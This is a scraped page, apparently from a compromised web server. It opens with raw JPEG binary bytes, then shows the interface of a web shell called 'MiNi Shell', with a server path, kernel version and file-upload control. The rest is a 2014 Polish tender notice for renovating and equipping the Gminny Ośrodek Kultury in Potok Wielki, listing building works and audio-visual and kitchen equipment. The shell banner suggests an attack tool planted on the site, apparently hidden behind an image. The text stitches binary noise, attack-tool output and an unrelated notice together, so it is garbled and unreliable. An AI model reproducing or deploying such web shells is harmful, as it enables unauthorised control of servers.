JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140328/106320-N-2014.html

<p class="kh_header"><b>Potok Wielki: Remont wraz z wyposażeniem Gminnego Ośrodka Kultury w Potoku Wielkim</b><br>
<b>Numer ogłoszenia: 106320 - 2014; data zamieszczenia: 28.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Kultury w Potoku Wielkim , 23-313 Potok Wielki, woj. lubelskie, tel. 15 874 0225, faks 15 874 0225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugpotokwielki.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont wraz z wyposażeniem Gminnego Ośrodka Kultury w Potoku Wielkim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont wraz z wyposażeniem Gminnego Ośrodka Kultury w Potoku Wielkim obejmujący: 

I) A. Remont klatki schodowej z korytarzami:
Powierzchnia korytarzy - 44,62m2
ZAKRES ROBÓT
- powierzchnia sufitu podwieszanego z płyt z włókien mineralnych na ruszcie metalowym wraz z zainstalowaniem lamp oświetleniowych wraz z przewodami elektrycznymi i kratek wentylacyjnych  - 39,26m2
- przetarcie tynków wewnętrznych z przetarciem farb - 162,52m2
- gruntowanie podłoży preparatami - 162,52m2
- tynk cienkowarstwowy na ścianach - 162,52m2
- tynk mozaikowy (podkład i wyprawa) - 83,97m2
- malowanie tynków wew. farbą emulsyjno-lateksową powyżej mozaiki - 78,55m2
- zamurowanie otworów w ścianach - 0,3m3
- tynki wew, III kat. - 11,2m2
- montaż poręczy ze stali nierdzewnej na klatce schodowej - 11m
- wykucie i montaż drzwi aluminiowych wew. DN 90x205 - 1 kpl. (1,85m2)
-  wykucie i montaż drzwi aluminiowych podwójnych zew. docieplonych DN 164x216 - 1 kpl. (3,54m2)
-  montaż drzwi aluminiowych podwójnych wew. DN 130x220 - 1 kpl. (2,86m2)
- montaż kratek wentylacyjnych w ścianach - 5 szt.
- wykonanie i montaż wyłazu na strych - 1 kpl.
- warstwa wyrównawcza pod posadzki wzmocniona siatką gr. 2 cm - 30,2m2
- posadzka z płytek z kamieni sztucznych - 30,2m2
- cokolik z kamieni sztucznych - 32,86 m
- oczyszczenie i konserwacja biegów schodów - 1 kpl. 

B. Sala wystawienniczo-szkoleniowa
Szer. 4,62m
Długość 6,7m
Wysokość 2,78m
Powierzchnia 30,95m2
ZAKRES ROBÓT
- tynk mozaikowy (podkład i wyprawa) - 19,37m2
- zamurowanie otworów w ścianach - 1,82m3
- ścianka działowa z betonu komórkowego gr. 12,5cm - 12,84m2
- tynki wew, III kat. - 19,22m2
- gruntowanie podłoży preparatami - 19,22m2
- tynk cienkowarstwowy na ścianach - 19,22m2
- malowanie tynków wew. farbą emulsyjno-lateksową x 3 - 7,19m2
- malowanie tynków wew. farbą emulsyjno-lateksową x 2 (odświeżenie ścian) - 21,26m2
- malowanie tynków wew. farbą emulsyjno-lateksową x 2 sufit - 30,95m2
- przebicie otworów w ścianach z cegły - 1,8m3
- montaż drzwi aluminiowych podwójnych wew. DN 130x220 - 1 kpl. (2,86m2)
- montaż drzwi wew. DN 80x205 - 1 kpl. (1,64m2)
- montaż drzwi wahadłowych DN 80/110-150cm - 1 kpl.
- montaż lamp oświetleniowych - 8 kpl.
- remont posadzki z desek gr. 19-22mm - 4,62m2
- cyklinowanie posadzki z desek - 30,95m2
- lakierowanie posadki z desek x3 - 30,95m2
- kratki wentylacyjne w ścianach 2x 2 szt. (po obu stronach)- 4 szt.
- ściana z cegły klinkierowej gr. 1 cegły - 0,55m3
- montaż płyty granitowej - 1 kpl.
- klimatyzacja - 1 kpl.
- wyposażenie sali - 1 kpl.

Specyfikacja sprzętu audio-wizualnego:
Notebook - sztuk 1	
Parametr  / funkcjonalność	Minimalne wymagania
Klasa produktu	Klasa biznesowa 
Zintegrowany wyświetlacz LCD	15,6 cali, z podświetleniem LED, matryca matowa, natywna rozdzielczość ekranu 1366x768
Procesor	Procesor zgodny z architekturą x86 zaprojektowany do pracy w urządzeniach typu notebook fabrycznie zamontowany przez producenta komputera na płycie głównej z dedykowanym  chipsetem.  Pozostałe:  częstotliwość  taktowania  zegara  procesora: min. 3,00 GHz, pamięć podręczna procesora: min. 3 MB, ilość rdzeni: min. 2
Pamięć RAM	4 GB (DDR3 SD RAM) 2 moduły po 2 GB, możliwość rozbudowy do 8 GB
Dysk Twardy	Dysk wewnętrzny 2.5  o pojemności  320 GB , 7200 RPM, S.M.A.R.T SATA 
Czytniki wewnętrzne	Nagrywarka DVD RW (tacka wysuwalna na nośnik)
Czytnik kart flash: Secure Digital, MultiMedia Card, Memory Stick
Czytnik ExpressCard/54 slot
Karta Graficzna	Karta graficzna niezintegrowana, min. 1024 MB dedykowanej pamięci video. Zgodna z Microsoft DirectX 10.1 i OpenGL
Zintegrowane komponenty	Karta  dźwiękowa  High  Definition  Audio;  Karta  sieciowa  Gigabit  LAN  RJ-45;  Karta sieciowa  Wireless  LAN  02.11  a/b/g/n;  Modem  analogowy  V.92  RJ-11;  Moduł  bluetooth  2.1  (dotykowe  włączanie  /  wyłączanie);  Kamera  internetowa  1,3MP  + mikrofon + głośniki stereo
Zintegrowane porty I  interfejsy	RJ-45; RJ-11; FireWire; port szeregowy; USB 3.0 - 3 szt.; Display Port; 15-pin mini 
D-SUB  VGA;  mikrofon;  słuchawki;  wejście  zasilacza  DC;  ExpressCard/54  slot; 
złącze  stacji  dokującej;  złącze  do  podłączenia  dodatkowej  baterii;  zintegrowana 
zabezpieczenie dla zamka wg standardu Kensington
Akumulator / bateria	LI-ION, min. 6 - komorowa, katalogowy czas pracy na baterii nie krótszy niż 260 minut
Oprogramowanie	Fabrycznie preinstalowany system operacyjny Windows 7 Pro PL 64 bit, dołączony nośnik recovery dla fabrycznie preinstalowanego systemu operacyjnego 
Wyposażenie dodatkowe	Torba do nooteboka zapinana na sówak z trwałego tworzywa  o kolorze czarnym,
Mysz optyczna z rolką
Przejściówka - adapter DisplayPort mini(M) -> HDMI(F) o parametrach: 
Wtyczka HDMI: 1x żeńska HDMI typ A (19-pin, Single Link) 
Wtyczka DisplayPort: 1x męska Mini DisplayPort 
pozłacane końcówki; na kablu długości co najmniej 5 cm  

Okres i warunki gwarancji	Sprzęt objęty gwarancją producenta na okres minimum 24 miesięcy, za
wyłączeniem baterii i wyposażenia dodatkowego objętego gwarancją na okres
minimum 12 miesięcy.
Oprogramowanie biurowe - sztuk 1	
Parametr / funkcjonalność 	Minimalne wymagania
Typ Licencji 	OEM - dystrybucyjna lub BOX lub zgodna lub równoważna z MOLP; nie związana z producentem oferowanego sprzętu, prawo do zastosowań w celach komercyjnych. 
Klasa produktu 	Licencja na produkt zgodny lub równoważny z Microsoft Office SBE 2010PL  
Wersja  językowa 	polska
Składniki	Edytor tekstu zgodny z WYSIWYG, arkusz kalkulacyjny, program do obsługi prezentacji multimedialnych
Nośnik instalacyjny	Do pobrania ze strony producenta
Rzutnik multimedialny z ekranem sterowanym elektrycznie - sztuk 1	
Parametr / funkcjonalność 	Minimalne wymagania
Klasa produktu	Projektor multimedialny  zgodny z DLP , 
Natywna rozdzielczość WXGA 1280x800
Wsparcie do montażu sufitowego	tak
Jasność (ANSI LUMENY)	Standard: min. 2900; Tryb Eco: min. 2400
Kontrast 	3700:1
Poziom hałasu 	Standard: max. 34 dBi; Tryb Eco: max. 31 dBi
Cyfrowy zoom	tak
Rozmiar obrazu (przekątna, cm)	80-600
Typ i Żywotność lampy  	Max. 240W, wymieniana przez użytkownika,  żywotność  zastosowanej  lampy:  Tryb  standardowy:  min.  do  2400  godz.; Tryb Eco: min. do 3800 godz.
Korekcja Keystone	+/- 35 stopni (w pionie)
Zintegrowane interfejsy 	15-pin D-Sub, Composite Video, S-Video, HDMI (video, HDCP), 1x USB
Typ projekcji	Przednia Tylnia
Okres i warunki gwarancji 	Sprzęt objęty gwarancją producenta na okres minimum 24 miesięcy, za wyłączeniem lampy i wyposażenia dodatkowego objętego gwarancją na okres minimum 12 miesięcy.
Wyposażenie dodatkowe 	- Ekran do zamocowania na stałe na ścianie lub na suficie,  powierzchnia  Matt-White  z  czarną  ramką,  powierzchnia  użytkowa  ekranu min. 250 x 190cm, długość kasety do 195 cm Pilot ze wskaźnikiem laserowym - zintegrowane przyciski do sterowania prezentacją PowerPoint (następny / poprzedni slajd)

Przewód Dsub <-> Dsub (VGA, 15 pin)	
Parametr / funkcjonalność 	Minimalne wymagania
zastosowanie	podłączenie monitora VGA D-Sub do karty graficznej z wyjściem VGA D-Sub
Standard 	D-Sub (15 pin)
Końcówka 1	D-Sub męski
Końcówka 2	D-Sub męski
długość	25 metrów
Okres i warunki gwarancji	Okres gwarancji 2 lata
ekran	Ekran 90% plecionka z pobielonej miedzi 38 AWG
konstrukcja	Przewód VGA zakończony koralikiem ferrytowym
Certyfikaty 	certyfikat CE
zastosowanie	Obsługa  wszystkie rozdzielczości  do 2048 x1536 (QXGA)
Sprzęt AUDIO
PowerMixer - sztuk 1	
Parametr / funkcjonalność 	Minimalne wymagania
Ilość kanałów  wejściowych	PowerMikser 8 - kanałowy
4 wejścia mikrofonowe typu XLR
4 wejścia liniowe typu JACK 
2 wejścia stereo audio typu RCA 
1 wejście stereo AUX typu JACK
MOC RMS	2 x 220 W /4 Ohm  2 x 130 W/8 Ohm  4-16 Ohm
Pasmo przenoszenia	20-20000Hz
Wbudowany korektor graficzny	tak
Funkcja stan by	tak
Funkcja on/off mute	tak
Regulacje 	High, Mid, Low, Level , Monitor
Wyjścia 	2 x sapekon 2 x jack
Zabezpieczenia 	termiczne, przeciążeniowe i przeciwzwarciowe stopnia mocy
Układ chłodzenia	Wentylator sterowany elektronicznie 
	
Zasilanie	220 VAC 50/60Hz
	
Okres i warunki gwarancji	Sprzęt objęty gwarancją producenta na okres minimum 24 miesięcy
Kolumny Głośnikowe - sztuk 4	
Parametr / funkcjonalność 	Minimalne wymagania
Typ	Pasywna, trójdrożna
Montaż 	Przystosowane do statywu, otwór na statyw standard
Skuteczność 	102 dB
Impedancja 	8 Ohm
Moc RMS	150W
Pasmo przenoszenia 	35-20000 Hz
Przyłącza 	2 x speakon (1 x Input + 1 x  Output)
Głośnik niskotonowy 	12
Okres i warunki gwarancji	Sprzęt objęty gwarancją producenta na okres minimum 24 miesięcy
Mikrofon bezprzewodowy z stacją bazową (dwa mikrofony bezprzewodowe obsługiwane przez jedną stację bazową )	
Parametr / funkcjonalność 	Minimalne wymagania
Zasilanie stacji bazowej	220 VAC 50/60Hz
Zakres częstotliwości  (nadajnik i odbiornik)	180-300 MHz
Zasilanie odbiornika	Akumulatory AA 1.5 V
Zasięg odbiornika 	100 m
Złącze 	JACK - JACK (w zestawie kabel o długości 1m)
Okres i warunki gwarancji	Sprzęt objęty gwarancją producenta na okres minimum 12 miesięcy
Kabel mikrofonowy - sztuk 2	
Parametr / funkcjonalność 	Minimalne wymagania
Długość 	10 m
Wtyki 	Neutrik NC3FXX i NC3MXX
Przewodnik 	żyłki czystej miedzi, 28 x 0,10 mm
Przekrój	0,22mm 2
Średnica 	6,0 mm
ekran	miedziany
Oporność przewodnika  < 93 Ohm / km
Mikrofon dynamiczny - sztuk 2	
Parametr / funkcjonalność 	Minimalne wymagania
Typ	Wokalny, profesjonalny
Gniazdo XLR
Obudowa metalowa
oporność 500 Ohm
czułość	-53 dB +/- 3 dB
Pasmo przenoszenia	60-15 kHz
Akcesoria w zestawie	Etui i uchwyt na statyw
	Sprzęt objęty gwarancją producenta na okres minimum 24 miesięcy
Kable głośnikowe speakon neutrin - sztuk 4	
Parametr / funkcjonalność 	Minimalne wymagania
długość	20m
przekrój	2x 5mm
Telewizor - sztuk 1	
Parametr / funkcjonalność 	Minimalne wymagania
Przekątna ekranu	40 cali
Technologia HD	Full HD
Rozdzielczość	1920x1080 (HD 1080)
Proporcje obrazu 	16:9
Rodzaj ekranu 	LED
Zastosowane technologie 	DVB-T, LED, Full HD, MPEG-4, Digital Noise Filter
System fonii	Stereo, głośniki 2 x 10W
Złącza 	3 X HDMI, Component Video, USB,  Euro, RGB,  karta pamięci CD
Okres i warunki gwarancji	Sprzęt objęty gwarancją producenta na okres minimum 24 miesięcy.
Statyw pod kolumny głośnikowe - sztuk 4	
Rozstaw nóg	1200mm
Płynna regulacja wysokości	13020-2100
średnica	35mm
kolor	czarny
Maksymalne obciążenie	40 Kg
Wyposażenie dodatkowe	Pokrowiec
Okres i warunki gwarancji	Sprzęt objęty gwarancją producenta na okres minimum 12 miesięcy

C. Zaplecze kuchenne
Szer. 4,62m i 2,54m
Długość 5,38m i 3,47m
Wysokość 2,78m i 3,40m
Powierzchnia 24,86m2 i 8,81m2
ZAKRES ROBÓT
- przetarcie tynków wewnętrznych z zeskrobaniem farb (ściany) - 83,63m2
- przetarcie tynków wewnętrznych z zeskrobaniem farb (sufit) - 33,67m2
- tynki wew., III kat. - 12,84m2
- gruntowanie podłoży preparatami (ściany) - 96,47m2
- gruntowanie podłoży preparatami (sufit) - 33,67m2
- tynk cienkowarstwowy na suficie (gładź gipsowa) - 33,67m2
- licowanie ścian płytkami z kamieni sztucznych 30x30cm - 96,47m2
- listwy narożnikowe - 29,5m
- warstwa wyrównawcza pod posadzki wzmocniona siatką gr. 10 cm - 33,67m2
- posadzka z płytek z kamieni sztucznych ponad 15x15cm - 33,67m2
- malowanie tynków wew. farbą emulsyjno-lateksową x 3 sufit - 33,67m2
- przebicie otworów w ścianach z cegły - 5,17m3
- obsadzenie podokienników prefabrykowanych (nadproża) - 1,6m
- montaż drzwi aluminiowych wew. DN 90x205 - 2 kpl. (3,7m2)
- montaż lamp oświetleniowych - 6 kpl.
- kratki wentylacyjne w ścianach - 2 szt.,
- kratki wentylacyjne z wentylatorem elektrycznym z rurą wywiewną zakończone daszkiem - 4 kpl.
- wykonanie przejścia łukowego z cegły klinkierowej z fugą wklęsłą - 0,43m3
- montaż okienka podawczego wraz z parapetem i wykończeniem ościeży - 1 kpl.
- dostosowanie instalacji wodociągowej, kanalizacyjnej i gazowej dla potrzeb zaplecza - 1 kpl.
- wyposażenie zaplecza kuchennego - 1 kpl.

Wyposażenia Zaplecza Kuchennego: 
-	Regał na ciasto o wymiarach (2x2x0,35m) - 1 szt.
-	Szafa przelotowa do naczyń o wymiarach (90x200x60cm) - 1 szt.
-	Krajalnica przemysłowa do wędlin o wymiarze noża fi 250 mm - 2 szt.
-	Taboret grzewczy elektryczny(płyta grzewcza 400 mm) - 1 szt.
-	Wózek podawczy szer. 80 cm dł. 1,5m dwu półkowy - 1 szt.
-	Ekspres do kawy o mocy 2,9kW poj. 6l wym. 50x60x51cm z wbudowanym modułem do cappuccino, automatyczne dozowanie i sterowanie - 1 szt.
-	Lodówka z zamrażarką i kostkarką lodu - 1 szt.
-	Mikrofalówka o poj. 30 l- 1 szt.
-	Kuchenka gazowa z piekarnikiem elektrycznym z termoobiegiem i z zapalarka elektryczną - 1 szt.
-	Patelnia elektryczna uchylna nierdzewna na stelażu gł. misy 150mm wymiar 570-430mm- 1 szt.
-	Zmywarka do naczyń przemysłowa z dozownikiem płynu myjącego i pompą zrzutową, wymiar kosza 50x50 cm- 1 szt.
-	Szafa chłodnicza przemysłowa min. 1400 dm3 - 1 szt.
-	Zestaw ociekowy ścienny szer. 120cm i wys. 80cm (dwudzielny)- 1 szt.
-	Regał na naczynia o wymiarach 1,5x2x0,6m - 1 szt.
-	Stół kuchenny ze stali nierdzewnej o wym. 2x1x0,8m z półką pod blatem na wys. 0,4m - 1 szt.
-	Basen do zmywania naczyń dwukomorowy gł. min 60 cm - 1 szt.
-	Taboret grzewczy gazowy gastronomiczny pojedynczy 9kW- 1 szt.

D. Zaplecze socjalno-magazynowe (na potrzeby sali wystawienniczo - szkoleniowej):
Szer. 2,90m
Długość 9,10m
Wysokość 3,42m i 2,94m
Powierzchnia 26,39m2
ZAKRES ROBÓT
- przetarcie tynków wewnętrznych z zeskrobaniem farb (ściany) - 79,92m2
- przetarcie tynków wewnętrznych z zeskrobaniem farb (sufit) - 25,24m2
- gruntowanie podłoży preparatami (ściany) - 79,92m2
- gruntowanie podłoży preparatami (sufit) - 25,24m2
- tynk cienkowarstwowy na ścianach (gładź gipsowa) - 75,84m2
- tynk cienkowarstwowy na suficie (gładź gipsowa) - 25,24m2
- docieplenie posadzki styropianem twardym gr. 5 cm - 25,24m2
- warstwa wyrównawcza pod posadzki wzmocniona siatką gr. 12 cm - 25,24m2
- posadzka z płytek z kamieni sztucznych ponad 15x15cm - 25,24m2
- cokolik z kamieni sztucznych - 24 m
- malowanie tynków wew. farbą emulsyjno-lateksową x 3 - 101,08m2
-  wykucie i montaż drzwi aluminiowych podwójnych zew. docieplonych DN 120x205 wraz z okienkiem aluminiowym 55x120- 1 kpl. (3,12m2)
- montaż drzwi aluminiowych wew. DN 90x205 - 1 kpl. (1,85m2)
- montaż lamp oświetleniowych - 4 kpl.
- kratki wentylacyjne w ścianach - 1 szt.,
- kratki wentylacyjne z rurą wywiewną zakończone daszkiem - 1 kpl.
- montaż okna 120x160 - 1 szt (1,92m2)
- montaż parapetu okiennego 30x125 - 1 szt.
- przebicie otworów w ścianach z cegły - 1,16m3
- ściana murowana z belitu gr. 38 cm - 1,52m3
- oścież otworów w ścianach muru gr. 1 cegły - 2 otwory
- obsadzenie podokienników prefabrykowanych (nadproża) - 2,8m
- tynki wew., III kat. - 8,02m2
- pokrycie daszku wejściowego do zaplecza blachą oc. powlekaną - 14,22m2
- wyposażenie zaplecza socjalno magazynowego - 1 kpl.

Wyposażenie zaplecza socjalno-magazynowego (na potrzeby sali wystawienniczo - szkoleniowej):
-	Szafa trzydrzwiowa z drzwiami przesuwnymi z lustrem na jednych drzwiach o wymiarze 2x0,6x2,05- 1 szt.

E. Roboty elektryczne
Wymiana zabezpieczeń w tablicach rozdzielczych - 2 kpl.
Dostosowanie instalacji elektrycznej do aktualnych potrzeb - 1 kpl.

F. Podjazd dla niepełnosprawnych:
Szer. 1,5m
Spadek i =6%
Długość podjazdu - 9,75mb
ZAKRES ROBÓT
Powierzchnia kostki brukowej -15,75m2
Murek szerokości 0,25m z cegły klinkierowej sucho-wklęsła - 1,44m3
Ława żelbetowa pod murek z betonu C12/15 - 1,23m3
Podbudowa z tłucznia łamanego 16/31,5 warstwa  dolna 15 cm i górna 15 cm
Poręcze ze stali nierdzewnej fi 40mm h=1,1m - 19,5mb
Wydłużenie odsadzki na całą szerokość podjazdu:
- koryto gł. 20 cm - 4m3
- krawężnik betonowy 15x30cm na ławie betonowej z oporem z betonu C2/15 - 3 m
- warstwa odsączająca z piasku gr. 10 cm - 2,1m2
- kostka brukowa (materiał z odzysku) - 2,1m2

G. Adaptacja pomieszczenia na pokój administracyjny:
szer. 2,53m
długość 2,80m
wysokość 2,93m
Powierzchnia 7,08m2
ZAKRES ROBÓT
- przetarcie tynków wewnętrznych z zeskrobaniem farb (ściany) - 15,25m2
- przetarcie tynków wewnętrznych z zeskrobaniem farb (sufit) - 7,08m2
- gruntowanie podłoży preparatami (ściany) - 31,24m2
- tynk cienkowarstwowy na ścianach (gładź gipsowa) - 31,24m2
- warstwa wyrównawcza pod posadzki wzmocniona siatką gr. 8 cm - 7,08m2
- posadzka z płytek z kamieni sztucznych ponad 15x15cm - 7,08m2
- cokolik z kamieni sztucznych - 10,66 m
- malowanie tynków wew. farbą emulsyjno-lateksową x 3 - 17,94m2
- wykucie i montaż drzwi aluminiowych wew. DN 90x205 - 1 kpl. (1,85m2)
- kratki wentylacyjne w ścianach - 2 szt.,
- kratki wentylacyjne z rurą wywiewną zakończone daszkiem - 1 kpl.
- powierzchnia sufitu podwieszanego z płyt z włókien mineralnych na ruszcie metalowym wraz z zainstalowaniem lamp oświetleniowych wraz z przewodami elektrycznymi i kratek wentylacyjnych - 7,08m2
- tynk mozaikowy (podkład i wyprawa) - 13,3m2
- wyposażenie  pokoju administracyjnego - 1 kpl.

Wyposażenia pokoju administracyjnego: 
-      Szafa wnękowa z drzwiami przesuwnymi (1,75x0,4x2,05)- 1 szt.
-	Biurko standard- 1 szt.
-	Komputer przenośny z oprogramowaniem i drukarką (parametry jak notebook dla Sali wystawienniczo szkoleniowej, drukarka laserowa kolorowa)- 1 kpl.
-	Krzesła biurowe ISO- 10 szt.


H. Sala nr 5
szer. 6,59m
długość 6,74m
wysokość 3,35m
Powierzchnia 44,42m2
ZAKRES ROBÓT
- przetarcie tynków wewnętrznych z zeskrobaniem farb (ściany i słup) - 96,01m2
- przetarcie tynków wewnętrznych z zeskrobaniem farb (sufit i podciąg) - 49,14m2
- odgrzybienie ścian metodą smarowania - 96,01m2
- gruntowanie podłoży preparatami (ściany i słupa) - 96,01m2
- gruntowanie podłoży preparatami (sufit i podciąg) - 49,14m2
- tynk cienkowarstwowy na ścianach i słupie (gładź gipsowa) - 96,01m2
- tynk cienkowarstwowy na sufit i podciąg (gładź gipsowa) - 49,14m2
- licowanie ścian płytami pilśniowymi z okleiną twardą z jednej strony na ruszcie drenianym do wys. 1,5m - 39,99m2
- obudowa podciagów płytami - 4,92m2
- malowanie tynków wew. farbą emulsyjno-lateksową x 3 - 145,15m2
- wykucie i montaż drzwi aluminiowych wew. DN 90x205 - 1 kpl. (1,85m2)
- wykucie i montaż drzwi aluminiowych zew. docieplanych DN 90x205 - 1 kpl. (1,85m2)
- wykucie i montaż parapetów okiennych 50x205 cm - 3 szt.
- kratki wentylacyjne w ścianach - 2 szt.,
- kratki wentylacyjne z rurą wywiewną zakończone daszkiem - 2 kpl.
- wykonanie i montaż poręczy ze stali nierdzewnej h=1,1m , l=0,3m - 1 kpl.

I. Garaż
Wykonanie i montaż drzwi aluminiowych podwójnych docieplanych 2x160/290cm przeszklone na całej szerokości od góry i wysokości 0,8m - 1kpl.

W pomieszczeniu nr 6 należy wykuć istniejące drzwi metalowe i zamontować nowe drzwi aluminiowe podwójne docieplane o wzmocnionej konstrukcji 2x160/290cm przeszklone na całej szerokości od góry i wysokości 0,8m. Kolor drzwi aluminiowych należy uzgodnić z Inwestorem..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.45.30.00-7, 45.42.11.46-9, 45.32.00.00-6, 45.21.00.00-2, 39.14.10.00-2, 31.71.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 10 000 zł, słownie: dziesięć tysięcy złotych.
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1) w pieniądzu, przelewem na rachunek bankowy: 
